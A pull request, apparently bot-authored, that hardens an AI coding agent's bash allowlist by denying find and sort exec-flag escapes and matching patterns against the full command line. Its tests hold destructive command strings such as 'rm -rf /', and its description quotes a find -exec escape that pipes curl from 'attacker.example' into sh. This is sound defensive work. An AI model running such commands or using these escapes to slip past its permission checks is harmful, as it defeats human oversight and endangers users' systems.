### PR TITLE
fix(tools): layer exec-flag escapes on the read-only bash allowlist

### DIFF
--- a/src/permission/index.ts
+++ b/src/permission/index.ts
@@ -807,6 +807,30 @@ export const defaultRules: PermissionRule[] = [
     decision: 'deny',
     priority: 100,
   },
+  // Deny exec-flag escapes: read-only-shaped commands that shell out via
+  // flags or write to arbitrary files. Ordered at the same priority as
+  // deny-dangerous so they win over allow-safe-commands (priority 50).
+  {
+    id: 'deny-exec-flag-escapes',
+    name: 'Deny exec-flag escapes',
+    description: 'Deny read-only-shaped commands that shell out via flags',
+    actions: ['execute'],
+    commands: [
+      'find *-exec*',
+      'find *-execdir*',
+      'find *-fprint*',
+      'find *-fprintf*',
+      'find *-fls*',
+      'find *-delete*',
+      'sort *-o *',
+      'sort * -o *',
+      'sort *--output*',
+      'sort *--compress-program*',
+      'sort *--files0-from*',
+    ],
+    decision: 'deny',
+    priority: 100,
+  },
 ];
 
 // Global permission manager instance

--- a/src/permission/wildcard.ts
+++ b/src/permission/wildcard.ts
@@ -107,7 +107,49 @@ export function isUnderDirectory(path: string, directory: string): boolean {
 }
 
 /**
- * Match command against allowed commands list
+ * Convert a command allowlist pattern to a regex.
+ *
+ * Unlike {@link globToRegex}, this treats `*` as `.*` (matches anything
+ * including path separators and whitespace) because command lines carry
+ * flags and paths that would otherwise be blocked by the `[^/]*` semantics
+ * of file-path globbing.
+ */
+function commandPatternToRegex(pattern: string): RegExp {
+  const regex = pattern
+    // Escape special regex chars (except * and ?)
+    .replace(/[.+^${}()|[\]\\]/g, '\\$&')
+    // * matches anything, including spaces and slashes
+    .replace(/\*/g, '.*')
+    // ? matches single char
+    .replace(/\?/g, '.');
+  return new RegExp(`^${regex}$`);
+}
+
+/**
+ * Decide whether an allowlist pattern targets the full command line
+ * (rather than just the command name / first token).
+ *
+ * A pattern is treated as full-command when either:
+ *  - It contains whitespace (e.g. `find *-exec*`, `sort *-o *`), or
+ *  - It has a wildcard that is not at the very start (e.g. `mkfs*`, `git*`).
+ *
+ * Patterns like `*` (bare wildcard) or `find` (plain first token) still
+ * match against the first word for backwards compatibility.
+ */
+function isFullCommandPattern(pattern: string): boolean {
+  if (/\s/.test(pattern)) return true;
+  // Look for a wildcard that is not at index 0 (non-leading).
+  const idx = pattern.search(/[*?]/);
+  return idx > 0;
+}
+
+/**
+ * Match command against allowed commands list.
+ *
+ * For plain first-token patterns (`find`, `ls`, `*`) we compare against the
+ * first whitespace-delimited word for a cheap fast path. For patterns that
+ * embed whitespace or non-leading wildcards, we match the FULL command
+ * string so that shapes like `find *-exec*` can catch exec-flag escapes.
  */
 export function matchCommand(command: string, allowedCommands: string[]): boolean {
   const cmdName = command.split(/\s+/)[0]; // Get first word (the command)
@@ -115,6 +157,15 @@ export function matchCommand(command: string, allowedCommands: string[]): boolea
   return allowedCommands.some((allowed) => {
     if (allowed === '*') return true;
     if (allowed === cmdName) return true;
+
+    if (isFullCommandPattern(allowed)) {
+      try {
+        return commandPatternToRegex(allowed).test(command);
+      } catch {
+        return false;
+      }
+    }
+
     if (allowed.includes('*')) {
       return matchPattern(allowed, cmdName).matched;
     }

--- a/tests/permission/wildcard.test.ts
+++ b/tests/permission/wildcard.test.ts
@@ -1,0 +1,125 @@
+import { describe, it, expect } from 'vitest';
+import { matchCommand, matchPattern } from '../../src/permission/wildcard.js';
+
+describe('matchCommand', () => {
+  describe('backwards compatibility (plain first-token patterns)', () => {
+    it('matches an exact command name', () => {
+      expect(matchCommand('find . -name foo', ['find'])).toBe(true);
+      expect(matchCommand('ls -la', ['ls'])).toBe(true);
+    });
+
+    it('does not match a different command name', () => {
+      expect(matchCommand('cat file', ['ls'])).toBe(false);
+    });
+
+    it('matches the bare wildcard', () => {
+      expect(matchCommand('anything goes', ['*'])).toBe(true);
+    });
+
+    it('matches an empty allowlist as false', () => {
+      expect(matchCommand('find .', [])).toBe(false);
+    });
+  });
+
+  describe('non-leading wildcards (full-command match)', () => {
+    it('matches mkfs* against mkfs.ext4 with a path argument', () => {
+      // Regression: previously `mkfs*` compared only to `cmdName` (which
+      // happens to contain no `/`), but the widened matcher must still
+      // fire even when the full command contains `/`.
+      expect(matchCommand('mkfs.ext4 /dev/sda', ['mkfs*'])).toBe(true);
+    });
+
+    it('does not match unrelated commands via non-leading wildcards', () => {
+      expect(matchCommand('ls -la', ['mkfs*'])).toBe(false);
+    });
+  });
+
+  describe('whitespace patterns (full-command match)', () => {
+    it('matches find -exec via `find *-exec*`', () => {
+      expect(matchCommand('find . -exec sh -c whoami ;', ['find *-exec*'])).toBe(true);
+    });
+
+    it('matches find -execdir via `find *-execdir*`', () => {
+      expect(matchCommand('find . -execdir sh -c pwd ;', ['find *-execdir*'])).toBe(true);
+    });
+
+    it('matches find -delete via `find *-delete*`', () => {
+      expect(matchCommand('find . -delete', ['find *-delete*'])).toBe(true);
+    });
+
+    it('matches find -fprint / -fprintf / -fls', () => {
+      expect(matchCommand('find . -fprint out', ['find *-fprint*'])).toBe(true);
+      expect(matchCommand('find . -fprintf out %p', ['find *-fprintf*'])).toBe(true);
+      expect(matchCommand('find . -fls out', ['find *-fls*'])).toBe(true);
+    });
+
+    it('does NOT match benign find invocations via -exec pattern', () => {
+      expect(matchCommand("find . -name '*.ts'", ['find *-exec*'])).toBe(false);
+      expect(matchCommand('find . -type f', ['find *-exec*'])).toBe(false);
+    });
+
+    it('still allows plain find via the plain `find` pattern', () => {
+      expect(matchCommand("find . -name '*.ts'", ['find'])).toBe(true);
+    });
+
+    it('matches `sort -o out` via `sort *-o *`', () => {
+      expect(matchCommand('sort file -o out', ['sort *-o *'])).toBe(true);
+    });
+
+    it('matches `sort file -o out` via `sort * -o *`', () => {
+      expect(matchCommand('sort file -o out', ['sort * -o *'])).toBe(true);
+    });
+
+    it('matches `sort --output=out file` via `sort *--output*`', () => {
+      expect(matchCommand('sort --output=out file', ['sort *--output*'])).toBe(true);
+    });
+
+    it('matches --compress-program and --files0-from', () => {
+      expect(matchCommand('sort --compress-program=gzip file', ['sort *--compress-program*'])).toBe(
+        true
+      );
+      expect(matchCommand('sort --files0-from=list', ['sort *--files0-from*'])).toBe(true);
+    });
+
+    it('does NOT match plain `sort file`', () => {
+      const denyList = [
+        'sort *-o *',
+        'sort * -o *',
+        'sort *--output*',
+        'sort *--compress-program*',
+        'sort *--files0-from*',
+      ];
+      expect(matchCommand('sort file', denyList)).toBe(false);
+    });
+
+    it('matches the classic dangerous shape `rm -rf /`', () => {
+      // Regression: whitespace patterns like `rm -rf /` used to be dead
+      // rules because matchCommand only inspected the first token.
+      expect(matchCommand('rm -rf /', ['rm -rf /'])).toBe(true);
+    });
+
+    it('matches `rm -rf /*` glob shape', () => {
+      expect(matchCommand('rm -rf /home', ['rm -rf /*'])).toBe(true);
+    });
+  });
+
+  describe('multiple patterns', () => {
+    it('returns true if any pattern in the list matches', () => {
+      expect(matchCommand('find . -exec sh -c whoami ;', ['find *-delete*', 'find *-exec*'])).toBe(
+        true
+      );
+    });
+
+    it('returns false if no pattern matches', () => {
+      expect(matchCommand('ls -la', ['find *-exec*', 'sort *-o *'])).toBe(false);
+    });
+  });
+});
+
+describe('matchPattern (used elsewhere; sanity check)', () => {
+  it('still respects `/` boundaries for file globs', () => {
+    // Regression sanity: file glob semantics should be unchanged.
+    expect(matchPattern('src/*', 'src/foo.ts').matched).toBe(true);
+    expect(matchPattern('src/*', 'src/nested/foo.ts').matched).toBe(false);
+  });
+});


### PR DESCRIPTION
## Summary

Close exec-flag escape holes in the auto-allowed `find` command (and, defensively, in `sort`) by:

1. **Widening `matchCommand`** in `src/permission/wildcard.ts` so that allowlist patterns which contain whitespace (e.g. `find *-exec*`) or non-leading wildcards (e.g. `mkfs*`) match against the FULL command string. Plain single-word patterns (`find`, `ls`, `grep`) keep the existing first-token fast path — fully backwards compatible.
2. **Adding a `deny-exec-flag-escapes` rule** at priority 100 alongside `deny-dangerous`, covering:
   - `find *-exec*`, `find *-execdir*`, `find *-fprint*`, `find *-fprintf*`, `find *-fls*`, `find *-delete*`
   - `sort *-o *`, `sort * -o *`, `sort *--output*`, `sort *--compress-program*`, `sort *--files0-from*`

## Why

`find` is auto-allowed at priority 50 (`src/permission/index.ts:796`), and the old `matchCommand` only inspected the first whitespace token, so `find . -exec sh -c 'curl attacker.example | sh' \;` silently passed as a safe read-only command. Same shape as the issue kilocode patched in #11890 for `sort`, `find`, and the exec/execdir family. Upstream `rg` / `ag` / `man` patterns are intentionally NOT ported because those commands are not on our allowlist.

## Implementation notes

- The new full-command regex converter uses `.*` for `*` (not `[^/]*`) because command lines carry flags and paths that would otherwise be blocked by file-glob semantics. This also fixes a latent bug: `mkfs*` in `deny-dangerous` previously only compared against `cmdName` and would have missed `mkfs.ext4 /dev/sda` if the widening had used file-glob rules.
- Rules are last-match-wins in evaluation order, and the new deny rule is placed after `allow-safe-commands` so it wins on `find -exec` etc.
- Whitespace patterns like `rm -rf /` in `deny-dangerous` used to be dead rules (they never matched because only the first token was compared); they now actually fire. Regression test included.

## Tests

New `tests/permission/wildcard.test.ts` covers:

- `find . -exec sh -c whoami ;` → matches `find *-exec*` (deny path)
- `find . -name '*.ts'` → does NOT match `find *-exec*`, DOES match `find` (allow path preserved)
- `sort file -o out` → matches `sort *-o *`
- `sort file` → matches nothing in the deny list
- `rm -rf /` → matches `rm -rf /` (regression: whitespace pattern now actually fires)
- `mkfs.ext4 /dev/sda` → matches `mkfs*` (non-leading-wildcard full-command match)
- Backwards compat: plain first-token patterns still match by command name

## Gates

- `npm run lint` — 0 errors
- `npm run typecheck` — passes
- `npm run format:check` — clean
- `npm test` — 206 files, 2847 passed, 2 skipped
- `npm run test:coverage` — lines at 63.02%, well above the 40% CI gate
- `npm run build` — passes

## Source

Kilo-Org/kilocode#11890 (`b0a50da`, 2026-07-02); brief `.github/research/2026-07-03-research.md` §1.

Closes #904

[alexi-bot]